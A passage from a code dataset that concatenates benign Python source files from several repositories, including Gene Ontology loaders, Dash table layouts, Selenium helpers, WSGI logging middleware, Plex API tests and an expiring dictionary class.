# self.biospecimen = pd.read_table(biospecimens_file, sep="\t", skiprows=[1, ],
# na_values=["[Not Available]", "[Unknown]", "[Not Applicable]"],
# usecols=columns
# )
# self.sample_barcodes = self.biospecimen[patient_col_name].tolist()
# self.biospecimen.set_index(patient_col_name, inplace=True)
```
#### File: openomics/database/ontology.py
```python
from io import TextIOWrapper
from typing import Tuple, List, Dict
import networkx as nx
import numpy as np
import obonet
import pandas as pd
import tqdm
from Bio.UniProt.GOA import _gaf20iterator, _gaf10iterator
from pandas import DataFrame
from .base import Database
from .interaction import Interactions
from ..utils.df import slice_adj
class Ontology(Database):
DELIM = "|"
def __init__(self,
path,
file_resources=None,
col_rename=None,
npartitions=0,
verbose=False):
"""
Manages dataset input processing from tables and construct an ontology network from .obo file. There ontology
network is G(V,E) where there exists e_ij for child i to parent j to present "node i is_a node j".
Args:
path:
file_resources:
col_rename:
npartitions:
verbose:
"""
self.network, self.node_list = self.load_network(file_resources)
super().__init__(
path=path,
file_resources=file_resources,
col_rename=col_rename,
npartitions=npartitions,
verbose=verbose,
)
def load_network(self, file_resources) -> Tuple[nx.MultiDiGraph, List[str]]:
raise NotImplementedError
def get_adjacency_matrix(self, node_list):
if hasattr(self, "adjacency_matrix"):
adjacency_matrix = self.adjacency_matrix
else:
adjacency_matrix = nx.adj_matrix(self.network, nodelist=node_list)
self.adjacency_matrix = adjacency_matrix
if node_list is None or list(node_list) == list(self.node_list):
return adjacency_matrix
elif set(node_list) < set(self.node_list):
return slice_adj(adjacency_matrix, list(self.node_list), node_list,
None)
elif not (set(node_list) < set(self.node_list)):
raise Exception("A node in node_list is not in self.node_list.")
return adjacency_matrix
def filter_network(self, namespace):
raise NotImplementedError
def filter_annotation(self, annotation: pd.Series):
go_terms = set(self.node_list)
filtered_annotation = annotation.map(lambda x: list(set(x) & go_terms)
if isinstance(x, list) else [])
return filtered_annotation
def get_child_nodes(self):
adj = self.get_adjacency_matrix(self.node_list)
leaf_terms = self.node_list[np.nonzero(adj.sum(axis=0) == 0)[1]]
return leaf_terms
def get_root_nodes(self):
adj = self.get_adjacency_matrix(self.node_list)
parent_terms = self.node_list[np.nonzero(adj.sum(axis=1) == 0)[0]]
return parent_terms
def get_dfs_paths(self, root_nodes: list, filter_duplicates=False):
"""
Return all depth-first search paths from root node(s) to children node by traversing the ontology directed graph.
Args:
root_nodes (list): ["GO:0008150"] if biological processes, ["GO:0003674"] if molecular_function, or ["GO:0005575"] if cellular_component
filter_duplicates (bool): whether to remove duplicated paths that end up at the same leaf nodes
Returns: pd.DataFrame of all paths starting from the root nodes.
"""
if not isinstance(root_nodes, list):
root_nodes = list(root_nodes)
paths = list(dfs_path(self.network.reverse(copy=True), root_nodes))
paths = list(flatten_list(paths))
paths_df = pd.DataFrame(paths)
if filter_duplicates:
paths_df = paths_df[~paths_df.duplicated(keep="first")]
paths_df = filter_dfs_paths(paths_df)
return paths_df
def remove_predecessor_terms(self, annotation: pd.Series):
leaf_terms = self.get_child_nodes()
if not annotation.map(lambda x: isinstance(x, list)).any():
annotation = annotation.str.split(self.DELIM)
go_terms_parents = annotation.map(lambda x: list(
set(x) & set(leaf_terms)) if isinstance(x, list) else None)
return go_terms_parents
@staticmethod
def get_node_color(
file="~/Bioinformatics_ExternalData/GeneOntology/go_colors_biological.csv",
):
go_colors = pd.read_csv(file)
def selectgo(x):
terms = [term for term in x if isinstance(term, str)]
if len(terms) > 0:
return terms[-1]
else:
return None
go_colors["node"] = go_colors[[
col for col in go_colors.columns if col.isdigit()
]].apply(selectgo, axis=1)
go_id_colors = go_colors[go_colors["node"].notnull()].set_index(
"node")["HCL.color"]
go_id_colors = go_id_colors[~go_id_colors.index.duplicated(
keep="first")]
print(go_id_colors.unique().shape,
go_colors["HCL.color"].unique().shape)
return go_id_colors
Ontology.to_scipy_adjacency = Interactions.to_scipy_adjacency
class HumanPhenotypeOntology(Ontology):
"""Loads the Human Phenotype Ontology database from https://hpo.jax.org/app/ .
Default path: "http://geneontology.org/gene-associations/" .
Default file_resources: {
"hp.obo": "http://purl.obolibrary.org/obo/hp.obo",
}
"""
COLUMNS_RENAME_DICT = {}
def __init__(
self,
path="https://hpo.jax.org/",
file_resources=None,
col_rename=COLUMNS_RENAME_DICT,
npartitions=0,
verbose=False,
):
"""
Handles downloading the latest Human Phenotype Ontology obo and annotation data, preprocesses them. It provide
functionalities to create a directed acyclic graph of Ontology terms, filter terms, and filter annotations.
"""
if file_resources is None:
file_resources = {
"hp.obo": "http://purl.obolibrary.org/obo/hp.obo",
}
super().__init__(
path,
file_resources,
col_rename=col_rename,
npartitions=npartitions,
verbose=verbose,
)
def info(self):
print("network {}".format(nx.info(self.network)))
def load_network(self, file_resources):
for file in file_resources:
if ".obo" in file:
network = obonet.read_obo(file_resources[file])
# network = network.reverse(copy=True)
node_list = np.array(network.nodes)
return network, node_list
def gafiterator(handle):
inline = handle.readline()
if inline.strip().startswith("!gaf-version: 2"):
# sys.stderr.write("gaf 2.0\n")
return _gaf20iterator(handle)
elif inline.strip() == "!gaf-version: 1.0":
# sys.stderr.write("gaf 1.0\n")
return _gaf10iterator(handle)
else:
return _gaf20iterator(handle)
class GeneOntology(Ontology):
"""Loads the GeneOntology database from http://geneontology.org .
Default path: "http://geneontology.org/gene-associations/" .
Default file_resources: {
"go-basic.obo": "http://purl.obolibrary.org/obo/go/go-basic.obo",
"goa_human.gaf": "goa_human.gaf.gz",
"goa_human_rna.gaf": "goa_human_rna.gaf.gz",
"goa_human_isoform.gaf": "goa_human_isoform.gaf.gz",
}
"""
COLUMNS_RENAME_DICT = {
"DB_Object_Symbol": "gene_name",
"DB_Object_ID": "gene_id",
"GO_ID": "go_id",
}
def __init__(
self,
path="http://geneontology.org/gene-associations/",
file_resources=None,
col_rename=COLUMNS_RENAME_DICT,
npartitions=0,
verbose=False,
):
"""
Loads the GeneOntology database from http://geneontology.org .
Default path: "http://geneontology.org/gene-associations/" .
Default file_resources: {
"go-basic.obo": "http://purl.obolibrary.org/obo/go/go-basic.obo",
"goa_human.gaf": "goa_human.gaf.gz",
"goa_human_rna.gaf": "goa_human_rna.gaf.gz",
"goa_human_isoform.gaf": "goa_human_isoform.gaf.gz",
}
Handles downloading the latest Gene Ontology obo and annotation data, preprocesses them. It provide
functionalities to create a directed acyclic graph of GO terms, filter terms, and filter annotations.
"""
if file_resources is None:
file_resources = {
"go-basic.obo": "http://purl.obolibrary.org/obo/go/go-basic.obo",
"goa_human.gaf": "goa_human.gaf.gz",
"goa_human_rna.gaf": "goa_human_rna.gaf.gz",
"goa_human_isoform.gaf": "goa_human_isoform.gaf.gz",
}
super().__init__(
path,
file_resources,
col_rename=col_rename,
npartitions=npartitions,
verbose=verbose,
)
def info(self):
print("network {}".format(nx.info(self.network)))
def load_dataframe(self, file_resources: Dict[str, TextIOWrapper], npartitions=None):
go_annotations = pd.DataFrame.from_dict(dict(self.network.nodes(data=True)), orient='index')
go_annotations["def"] = go_annotations["def"].apply(lambda x: x.split('"')[1] if isinstance(x, str) else None)
go_annotations.index.name = "go_id"
# Handle .gaf annotation files
gaf_annotation_dfs = []
for file in file_resources:
if ".gaf" in file:
go_lines = []
for line in tqdm.tqdm(gafiterator(file_resources[file]), desc=file):
go_lines.append(line)
gaf_annotation_dfs.append(pd.DataFrame(go_lines))
if len(gaf_annotation_dfs):
self.gaf_annotations: pd.DataFrame = pd.concat(gaf_annotation_dfs).reset_index(drop=True)
self.gaf_annotations = self.gaf_annotations.rename(columns=self.COLUMNS_RENAME_DICT)
self.gaf_annotations["Date"] = pd.to_datetime(self.gaf_annotations["Date"], )
print("gaf_annotations:", self.gaf_annotations.columns.tolist())
return go_annotations
def load_network(self, file_resources):
for file in file_resources:
if ".obo" in file:
network: nx.MultiDiGraph = obonet.read_obo(file_resources[file])
# network = network.reverse(copy=True)
node_list = np.array(network.nodes)
return network, node_list
def filter_network(self, namespace) -> Tuple[DataFrame]:
"""
Filter the subgraph node_list to only `namespace` terms.
Args:
namespace: one of {"biological_process", "cellular_component", "molecular_function"}
"""
terms = self.data[self.data["namespace"] == namespace]["go_id"].unique()
print("{} terms: {}".format(namespace,
len(terms))) if self.verbose else None
self.network = self.network.subgraph(nodes=list(terms))
self.node_list = np.array(list(terms))
def annotation_train_val_test_split(self, train_date: str = "2017-06-15", valid_date: str = "2017-11-15",
include: List[str] = ['EXP', 'IDA', 'IPI', 'IMP', 'IGI', 'IEP', 'TAS', 'IC'],
groupby=["gene_name"]):
gaf_annotations = self.gaf_annotations[self.gaf_annotations["Evidence"].isin(include)]
# Split train/valid/test annotations
train_go_ann = gaf_annotations[gaf_annotations["Date"] <= pd.to_datetime(train_date)]
valid_go_ann = gaf_annotations[gaf_annotations["Date"] <= pd.to_datetime(valid_date)]
test_go_ann = gaf_annotations.drop(index=valid_go_ann.index)
valid_go_ann = valid_go_ann.drop(index=train_go_ann.index)
outputs = []
for go_anns in [train_go_ann, valid_go_ann, test_go_ann]:
is_neg_ann = go_anns["Qualifier"].map(lambda li: "NOT" in li)
# Positive and negative gene-GO annotations
gene_go_anns: DataFrame = go_anns[~is_neg_ann].groupby(groupby).agg(go_id=("go_id", "unique"))
neg_anns = go_anns[is_neg_ann].groupby(groupby).agg(neg_go_id=("go_id", "unique"))
gene_go_anns["neg_go_id"] = neg_anns["neg_go_id"]
gene_go_anns.drop(index=[""], inplace=True, errors="ignore")
# Remove "GO:0005515" (protein binding) annotations for a gene if it's the gene's only annotation
gene_go_anns.loc[gene_go_anns["go_id"].map(lambda li: len(li) == 1 and "GO:0005515" in li), "go_id"] = None
gene_go_anns.drop(index=gene_go_anns.index[gene_go_anns.isna().all(1)], inplace=True)
outputs.append(gene_go_anns)
return tuple(outputs)
def get_predecessor_terms(self, annotations: pd.Series, type="is_a"):
go_terms_parents = annotations.map(
lambda annotations: list({
parent for term in annotations \
for parent in list(nx.ancestors(self.network, term))}) \
if isinstance(annotations, list) else []) # flatten(self.traverse_predecessors(term, type))}) \
return go_terms_parents
def add_predecessor_terms(self, annotation: pd.Series, return_str=False):
if (annotation.dtypes == np.object
and annotation.str.contains("\||;", regex=True).any()):
go_terms_annotations = annotation.str.split("|")
else:
go_terms_annotations = annotation
go_terms_parents = go_terms_annotations + self.get_predecessor_terms(annotation)
if return_str:
go_terms_parents = go_terms_parents.map(
lambda x: "|".join(x) if isinstance(x, list) else None)
return go_terms_parents
def traverse_predecessors(network, seed_node, type=["is_a", "part_of"]):
"""
Returns all successor terms from seed_node by traversing the ontology network with edges == `type`.
Args:
seed_node: seed node of the traversal
type: the ontology type to include
Returns:
generator of list of lists for each dfs branches.
"""
parents = dict(network.pred[seed_node])
for parent, v in parents.items():
if list(v.keys())[0] in type:
yield [parent] + list(traverse_predecessors(network, parent, type))
def flatten(lst):
return sum(([x] if not isinstance(x, list) else flatten(x) for x in lst),
[])
def dfs_path(graph, path):
node = path[-1]
successors = list(graph.successors(node))
if len(successors) > 0:
for child in successors:
yield list(dfs_path(graph, path + [child]))
else:
yield path
def flatten_list(list_in):
if isinstance(list_in, list):
for l in list_in:
if isinstance(list_in[0], list):
for y in flatten_list(l):
yield y
elif isinstance(list_in[0], str):
yield list_in
else:
yield list_in
def filter_dfs_paths(paths_df: pd.DataFrame):
idx = {}
for col in sorted(paths_df.columns[:-1], reverse=True):
idx[col] = ~(paths_df[col].notnull()
& paths_df[col].duplicated(keep="first")
& paths_df[col + 1].isnull())
idx = pd.DataFrame(idx)
paths_df = paths_df[idx.all(axis=1)]
return paths_df
def write_taxonomy(network, root_nodes, file_path):
"""
Args:
network: A network with edge(i, j) where i is a node and j is a child of i.
root_nodes (list): a list of node names
file_path (str):
"""
file = open(file_path, "a")
file.write("Root\t" + "\t".join(root_nodes) + "\n")
for root_node in root_nodes:
for node, children in nx.traversal.bfs_successors(network, root_node):
if len(children) > 0:
file.write(node + "\t" + "\t".join(children) + "\n")
file.close()
```
#### File: openomics/visualization/umap.py
```python
import numpy as np
import plotly.express as px
import umap
def d3_umap(X, y_km, heat=None):
"""
Args:
X:
y_km:
heat:
"""
reducer = umap.UMAP(random_state=1234, n_components=3)
X_embedded = reducer.fit_transform(X)
node_colors = get_node_colormap(y_km)
x, y, z = X_embedded[:, 0], X_embedded[:, 1], X_embedded[:, 2]
fig = px.scatter_3d(x=x, y=y, z=z, color=node_colors)
fig.show()
return reducer
def get_node_colormap(node_label):
"""
Args:
node_label:
"""
if type(node_label) == list:
node_labels = node_label
sorted_node_labels = sorted(set(node_labels), reverse=True)
colors = np.linspace(0, 1, len(sorted_node_labels))
node_colormap = {f: colors[sorted_node_labels.index(f)] for f in set(node_labels)}
node_colors = [node_colormap[n] if n in node_colormap.keys() else None for n in node_labels]
elif node_label.dtype == "object":
node_labels = node_label.str.split("|", expand=True)[0]
sorted_node_labels = sorted(node_labels.unique(), reverse=True)
colors = np.linspace(0, 1, len(sorted_node_labels))
node_colormap = {f: colors[sorted_node_labels.index(f)] for f in node_labels.unique()}
node_colors = [node_colormap[n] if n in node_colormap.keys() else None for n in node_labels]
elif node_label.dtype == "float":
node_labels = node_label.values
node_colormap = None
node_colors = [n / node_labels.max() for n in node_labels]
return node_colors
```
#### File: openomics_web/layouts/datatable_view.py
```python
import dash_core_components as dcc
import dash_html_components as html
import dash_table as dt
from openomics_web.utils.str_utils import longest_common_prefix
def DataTableColumnSelect(columns):
"""
Args:
columns:
"""
longest_common_prefixes = longest_common_prefix(columns)
return html.Div([
html.Div(['Select the gene id/name column to index by:']),
dcc.Dropdown(
id='data-table-genes-col-name',
options=[{'label': col, 'value': col} for col in columns],
style={
'width': '100%',
},
value=columns[0],
),
html.Div(['Select the column prefixes to import:']),
dcc.Dropdown(
id='data-table-columns-select',
options=[{'label': col, 'value': col} for col in longest_common_prefixes],
style={
'width': '100%',
},
multi=True,
)
])
def ExpressionDataTable(df):
"""
Args:
df:
"""
return html.Div(
className="row",
children=[
html.Div(
dt.DataTable(
id='expression-datatable',
columns=[{"name": i, "id": i} for i in df.columns],
page_current=0,
page_size=20,
page_action='custom',
filter_action='custom',
filter_query='',
sort_action='custom',
sort_mode='multi',
sort_by=[],
style_as_list_view=True,
style_cell={
'overflow': 'hidden',
'textOverflow': 'clip',
'whiteSpace': 'normal'
},
style_data={'width': '30px'},
style_data_conditional=[
{'if': {'row_index': 'odd'},
'backgroundColor': 'rgb(248, 248, 248)'
},
],
style_table={"maxHeight": '800px',
'width': '800px',
'marginTop': '5px',
'marginBottom': '10px',
'overflowX': 'scroll'
},
style_header={
'backgroundColor': 'white',
'fontWeight': 'bold'
},
row_selectable="multi",
selected_rows=[],
# virtualization=True,
),
style={'height': 750, 'overflowY': 'scroll'},
className='six columns'
),
html.Div(
id='table-paging-with-graph-container',
className="five columns"
)
]
)
operators = [['ge ', '>='],
['le ', '<='],
['lt ', '<'],
['gt ', '>'],
['ne ', '!='],
['eq ', '='],
['contains '],
['datestartswith ']]
def split_filter_part(filter_part):
"""
Args:
filter_part:
"""
for operator_type in operators:
for operator in operator_type:
if operator in filter_part:
name_part, value_part = filter_part.split(operator, 1)
name = name_part[name_part.find('{') + 1: name_part.rfind('}')]
value_part = value_part.strip()
v0 = value_part[0]
if (v0 == value_part[-1] and v0 in ("'", '"', '`')):
value = value_part[1: -1].replace('\\' + v0, v0)
else:
try:
value = float(value_part)
except ValueError:
value = value_part
# word operators need spaces after them in the filter string,
# but we don't want these later
return name, operator_type[0].strip(), value
return [None] * 3
def expression_data_view():
return html.Div(id='table-container', children=[dt.DataTable(
id="data-table",
row_selectable='multi',
# sorting=True,
# filtering=True,
css=[{
"selector": ".dash-cell div.dash-cell-value",
"rule": "display: inline; "
"white-space: inherit; "
"overflow: auto; "
"text-overflow: inherit;"
}],
style_cell={
"whiteSpace": "no-wrap",
"overflow": "hidden",
"textOverflow": "ellipsis",
"maxWidth": 100,
'fontWeight': 100,
'fontSize': '11pt',
'fontFamily': 'Courier New',
'backgroundColor': '#1F2132'
},
style_header={
'backgroundColor': '#1F2132',
'textAlign': 'center'
},
style_table={
"maxHeight": "310px",
'width': '320px',
'marginTop': '5px',
'marginBottom': '10px',
},
# n_fixed_rows=1,
# n_fixed_columns=1
)])
``` |
{
"source": "JonnyWaffles/logscrapertutorial",
"score": 2
} |
#### File: logscrapertutorial/tests/test_data.py
```python
from collections import deque
from logscrapertutorial.data import fake
from logscrapertutorial.data.logfactory import create_fake_log, delete_data_files
from logscrapertutorial.utils import repeatfunc
def test_create_and_clean_up_logs():
log_count = fake.pyint(max_value=5, min_value=1)
gen = repeatfunc(create_fake_log, times=log_count)
deque(gen, 0)
assert delete_data_files() == log_count
```
#### File: logscrapertutorial/utils/func.py
```python
from collections import deque
from itertools import starmap, repeat
def repeatfunc(func, times=None, *args):
"""Repeat calls to func with specified arguments.
Example: repeatfunc(random.random)
"""
if times is None:
return starmap(func, repeat(args))
return starmap(func, repeat(args, times))
def exhaust(generator):
"""Exausts an iterable. Shortcut to deque with maxlen 0.
As I understand it deque is the most Pythonic way to exhaust an iterable.
"""
deque(generator, maxlen=0)
``` |
{
"source": "JonnyWaffles/selenium_page",
"score": 3
} |
#### File: selenium_page/selenium_page/utils.py
```python
import re
from time import sleep
from selenium.common.exceptions import (ElementClickInterceptedException, ElementNotVisibleException)
from .decorators import coroutine
def safe_send_keys(elem, keys):
elem.clear()
elem.send_keys(keys)
def make_valid_field_names(names):
ret = []
unknown_field_counter = 1
for name in names:
name = name.strip()
if name == '':
name = 'unnamed' + str(unknown_field_counter)
unknown_field_counter += 1
else:
name = name.replace('#', 'number')
name = clean(name)
name = name.lower()
ret.append(name)
return ret
def clean(s):
# Remove invalid characters
s = re.sub('[^0-9a-zA-Z_]', '', s)
# Remove leading characters until we find a letter
s = re.sub('^[^a-zA-Z]+', '', s)
return s
def chunks(l, n):
"""
Yields successive n-sized chunks from list
credit to `Ned Batchelder`_
Args:
l (iterable): An iterable to be split in to n sized chunks
n (int): The size of the yielded chunks
Yields:
list: An n-sized list
.. _Ned Batchelder:
https://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks
"""
for i in range(0, len(l), n):
yield l[i:i+n]
@coroutine
def unique_key_generator(dictionary):
"""This generator object creates unique keys for the target dictionary.
If the key already exists in the dictionary it appends the number
of occurrences to the key name. Useful when creating search results identifiers.
Args:
dictionary (dict): The target dictionary to check
Yields:
str: A unique key name
"""
duplicate_keys = {}
# prime the key variable
key = None
while True:
key = (yield key)
if dictionary.get(key, None):
count = duplicate_keys.get(key, None) or 1
count += 1
duplicate_keys[key] = count
key = key + "_{}".format(str(count))
def scroll_to_click_element_until_timeout(element, timeout=10):
"""Attempts to click an element until timeout.
Scrolls to the element until the click succeeds or timeout.
Args:
element: Element to be clicked
timeout: Time before failure occurs
"""
driver = element.parent
counter = 0
while True:
try:
element.click()
return
except (ElementClickInterceptedException,
ElementNotVisibleException):
driver.execute_script('arguments[0].scrollIntoView();', element)
counter += 1
if counter > timeout:
break
sleep(1)
``` |
{
"source": "JonnyWaffles/wsgi-listener",
"score": 2
} |
#### File: wsgi-listener/tests/test_middleware.py
```python
import logging
from io import BytesIO
from wsgiref.util import setup_testing_defaults
from pytest import fixture
from .context import WSGIListenerMiddleware, DEFAULT_LISTENER_LOG_NAME
@fixture
def environ_factory():
def _environ_factory(**kwargs):
environ = dict(kwargs)
setup_testing_defaults(environ)
return environ
return _environ_factory
@fixture
def environ_with_request_body_factory(environ_factory):
def _factory(request_body: BytesIO = None, environ: dict = None):
if not environ:
environ = environ_factory()
if request_body:
environ['wsgi.input'] = request_body
environ['CONTENT_LENGTH'] = request_body.getbuffer().nbytes
return environ
return _factory
def app(environ, start_fn):
start_fn('200 OK', [('Content-Type', 'text/plain')])
yield b'Hello World!\n'
def start_response(status_code, headers, exc_info=None):
return status_code, headers, exc_info
def test_middleware_passthrough(environ_factory):
environ = environ_factory()
wrapped_app = WSGIListenerMiddleware(app)
rv = wrapped_app(environ, start_response)
assert next(rv) == b'Hello World!\n'
def test_middleware_default_response_listener(caplog, environ_factory):
environ = environ_factory()
wrapped_app = WSGIListenerMiddleware(app)
with caplog.at_level(logging.INFO, logger=DEFAULT_LISTENER_LOG_NAME):
wrapped_app(environ, start_response)
assert caplog.text
def test_listeners(environ_with_request_body_factory):
# noinspection PyAttributeOutsideInit,PyShadowingNames
class EchoRequestListener:
def handle(self, environ: dict, request_body: bytes, **kwargs):
self.environ = environ
self.request_body = request_body
# noinspection PyAttributeOutsideInit,PyShadowingNames
class EchoResponseListener:
def handle(self, status_code: int, environ: dict, content_length: int, response_body: bytes,
processing_time: float, **kwargs):
self.status_code = status_code
self.environ = environ
self.content_length = content_length
self.response_body = response_body
self.processing_time = processing_time
request_listener = EchoRequestListener()
response_listener = EchoResponseListener()
body = BytesIO(b'Test')
environ = environ_with_request_body_factory(body)
wrapped_app = WSGIListenerMiddleware(app, request_listeners=[request_listener],
response_listeners=[response_listener])
wrapped_app(environ, start_response)
assert request_listener.environ is environ
assert request_listener.request_body == b'Test'
assert response_listener.status_code
assert response_listener.environ is environ
assert response_listener.response_body == b'Hello World!\n'
assert response_listener.content_length == len(b'Hello World!\n')
assert response_listener.processing_time
```
#### File: wsgi-listener/wsgi_listener/formatters.py
```python
from datetime import datetime as dt
from .timehacks import Local
def standard_formatter(status_code, environ, content_length):
return "{0} {1}".format(dt.now().isoformat(), status_code)
# noinspection PyPep8Naming
def ApacheFormatter(with_response_time=True):
""" A factory that returns the wanted formatter """
if with_response_time:
return ApacheFormatters.format_with_response_time
else:
return ApacheFormatters.format_NCSA_log
# noinspection PyPep8Naming
class ApacheFormatters(object):
@staticmethod
def format_NCSA_log(status_code, environ, content_length, **kwargs):
"""
Apache log format 'NCSA extended/combined log':
"%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\""
see http://httpd.apache.org/docs/current/mod/mod_log_config.html#formats
"""
# Let's collect log values
val = dict()
ip_header = kwargs.get('ip_header', None)
if ip_header:
try:
val['host'] = environ.get(ip_header, '')
except:
val['host'] = environ.get('REMOTE_ADDR', '')
else:
val['host'] = environ.get('REMOTE_ADDR', '')
val['logname'] = '-'
val['user'] = '-'
date = dt.now(tz=Local)
month = ["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"][date.month - 1]
val['time'] = date.strftime("%d/{0}/%Y:%H:%M:%S %z".format(month))
val['request'] = "{0} {1} {2}".format(
environ.get('REQUEST_METHOD', ''),
environ.get('PATH_INFO', ''),
environ.get('SERVER_PROTOCOL', '')
)
val['status'] = status_code
val['size'] = content_length
val['referer'] = environ.get('HTTP_REFERER', '')
val['agent'] = environ.get('HTTP_USER_AGENT', '')
# see http://docs.python.org/3/library/string.html#format-string-syntax
FORMAT = '{host} {logname} {user} [{time}] "{request}" '
FORMAT += '{status} {size} "{referer}" "{agent}"'
return FORMAT.format(**val)
@staticmethod
def format_with_response_time(*args, **kwargs):
"""
The dict kwargs should contain 'rt_us', the response time in milliseconds.
This is the format for TinyLogAnalyzer:
https://pypi.python.org/pypi/TinyLogAnalyzer
"""
rt_us = kwargs.get('rt_us')
return ApacheFormatters.format_NCSA_log(*args, **kwargs) + " {0}/{1}".format(int(rt_us/1000000), rt_us)
``` |
{
"source": "JonnyWong16/Plex-Trakt-Scrobbler",
"score": 2
} |
#### File: library/extra/guid.py
```python
from plex.objects.core.base import Descriptor, Property
class Guid(Descriptor):
id = Property(type=str)
@classmethod
def from_node(cls, client, node):
return cls.construct(client, cls.helpers.find(node, 'Guid'), child=True)
``` |
{
"source": "JonnyWong16/python-plexapi",
"score": 2
} |
#### File: python-plexapi/tests/test_mixins.py
```python
from plexapi.exceptions import NotFound
from plexapi.utils import tag_singular
import pytest
from . import conftest as utils
TEST_MIXIN_TAG = "Test Tag"
CUTE_CAT_SHA1 = "9f7003fc401761d8e0b0364d428b2dab2f789dbb"
def _test_mixins_tag(obj, attr, tag_method):
add_tag_method = getattr(obj, "add" + tag_method)
remove_tag_method = getattr(obj, "remove" + tag_method)
field_name = tag_singular(attr)
_tags = lambda: [t.tag for t in getattr(obj, attr)]
_fields = lambda: [f for f in obj.fields if f.name == field_name]
# Check tag is not present to begin with
tags = _tags()
assert TEST_MIXIN_TAG not in tags
# Add tag and lock the field
add_tag_method(TEST_MIXIN_TAG)
obj.reload()
tags = _tags()
fields = _fields()
assert TEST_MIXIN_TAG in tags
assert fields and fields[0].locked
# Remove tag and unlock to field to restore the clean state
remove_tag_method(TEST_MIXIN_TAG, locked=False)
obj.reload()
tags = _tags()
fields = _fields()
assert TEST_MIXIN_TAG not in tags
assert not fields
def edit_collection(obj):
_test_mixins_tag(obj, "collections", "Collection")
def edit_country(obj):
_test_mixins_tag(obj, "countries", "Country")
def edit_director(obj):
_test_mixins_tag(obj, "directors", "Director")
def edit_genre(obj):
_test_mixins_tag(obj, "genres", "Genre")
def edit_label(obj):
_test_mixins_tag(obj, "labels", "Label")
def edit_mood(obj):
_test_mixins_tag(obj, "moods", "Mood")
def edit_producer(obj):
_test_mixins_tag(obj, "producers", "Producer")
def edit_similar_artist(obj):
_test_mixins_tag(obj, "similar", "SimilarArtist")
def edit_style(obj):
_test_mixins_tag(obj, "styles", "Style")
def edit_tag(obj):
_test_mixins_tag(obj, "tags", "Tag")
def edit_writer(obj):
_test_mixins_tag(obj, "writers", "Writer")
def _test_mixins_image(obj, attr):
cap_attr = attr[:-1].capitalize()
get_img_method = getattr(obj, attr)
set_img_method = getattr(obj, "set" + cap_attr)
upload_img_method = getattr(obj, "upload" + cap_attr)
images = get_img_method()
if images:
default_image = images[0]
image = images[0]
assert len(image.key) >= 10
if not image.ratingKey.startswith(("default://", "id://", "media://", "upload://")):
assert image.provider
assert len(image.ratingKey) >= 10
assert utils.is_bool(image.selected)
assert len(image.thumb) >= 10
print(images)
if len(images) >= 2:
# Select a different image
for i in images:
print(vars(i))
set_img_method(images[1])
images = get_img_method()
for i in images:
print(vars(i))
assert images[0].selected is False
assert images[1].selected is True
else:
default_image = None
# Test upload image from file
upload_img_method(filepath=utils.STUB_IMAGE_PATH)
images = get_img_method()
file_image = [
i for i in images
if i.ratingKey.startswith('upload://') and i.ratingKey.endswith(CUTE_CAT_SHA1)
]
assert file_image
# Reset to default image
if default_image:
set_img_method(default_image)
def edit_art(obj):
_test_mixins_image(obj, 'arts')
def edit_banner(obj):
_test_mixins_image(obj, 'banners')
def edit_poster(obj):
_test_mixins_image(obj, 'posters')
def _test_mixins_imageUrl(obj, attr):
url = getattr(obj, attr + 'Url')
if getattr(obj, attr):
assert url.startswith(utils.SERVER_BASEURL)
assert "/library/metadata/" in url or "/library/collections/" in url
assert attr in url or "composite" in url
if attr == 'thumb':
assert getattr(obj, 'posterUrl') == url
else:
assert url is None
def attr_artUrl(obj):
_test_mixins_imageUrl(obj, 'art')
def attr_bannerUrl(obj):
_test_mixins_imageUrl(obj, 'banner')
def attr_posterUrl(obj):
_test_mixins_imageUrl(obj, 'thumb')
def _test_mixins_editAdvanced(obj):
for pref in obj.preferences():
currentPref = obj.preference(pref.id)
currentValue = currentPref.value
newValue = next(v for v in pref.enumValues if v != currentValue)
obj.editAdvanced(**{pref.id: newValue})
obj.reload()
newPref = obj.preference(pref.id)
assert newPref.value == newValue
def _test_mixins_editAdvanced_bad_pref(obj):
with pytest.raises(NotFound):
assert obj.preference('bad-pref')
def _test_mixins_defaultAdvanced(obj):
obj.defaultAdvanced()
obj.reload()
for pref in obj.preferences():
assert pref.value == pref.default
def edit_advanced_settings(obj):
_test_mixins_editAdvanced(obj)
_test_mixins_editAdvanced_bad_pref(obj)
_test_mixins_defaultAdvanced(obj)
``` |
{
"source": "jonnyyu/expiringdict",
"score": 3
} |
#### File: expiringdict/expiringdict/__init__.py
```python
import time
from threading import RLock
import sys
from typing import Any, Union
try:
from collections import OrderedDict
except ImportError:
# Python < 2.7
from ordereddict import OrderedDict
class ExpiringDict(OrderedDict):
def __init__(self, max_len, max_age_seconds, items=None):
# type: (Union[int, None], Union[float, None], Union[None,dict,OrderedDict,ExpiringDict]) -> None
if not self.__is_instance_of_expiring_dict(items):
self.__assertions(max_len, max_age_seconds)
OrderedDict.__init__(self)
self.max_len = max_len
self.max_age = max_age_seconds
self.lock = RLock()
if sys.version_info >= (3, 5):
self._safe_keys = lambda: list(self.keys())
else:
self._safe_keys = self.keys
if items is not None:
if self.__is_instance_of_expiring_dict(items):
self.__copy_expiring_dict(max_len, max_age_seconds, items)
elif self.__is_instance_of_dict(items):
self.__copy_dict(items)
elif self.__is_reduced_result(items):
self.__copy_reduced_result(items)
else:
raise ValueError('can not unpack items')
def __contains__(self, key):
""" Return True if the dict has a key, else return False. """
try:
with self.lock:
item = OrderedDict.__getitem__(self, key)
if time.time() - item[1] < self.max_age:
return True
else:
del self[key]
except KeyError:
pass
return False
def __getitem__(self, key, with_age=False):
""" Return the item of the dict.
Raises a KeyError if key is not in the map.
"""
with self.lock:
item = OrderedDict.__getitem__(self, key)
item_age = time.time() - item[1]
if item_age < self.max_age:
if with_age:
return item[0], item_age
else:
return item[0]
else:
del self[key]
raise KeyError(key)
def __setitem__(self, key, value, set_time=None):
""" Set d[key] to value. """
with self.lock:
if len(self) == self.max_len:
if key in self:
del self[key]
else:
try:
self.popitem(last=False)
except KeyError:
pass
if set_time is None:
set_time = time.time()
OrderedDict.__setitem__(self, key, (value, set_time))
def pop(self, key, default=None):
""" Get item from the dict and remove it.
Return default if expired or does not exist. Never raise KeyError.
"""
with self.lock:
try:
item = OrderedDict.__getitem__(self, key)
del self[key]
return item[0]
except KeyError:
return default
def ttl(self, key):
""" Return TTL of the `key` (in seconds).
Returns None for non-existent or expired keys.
"""
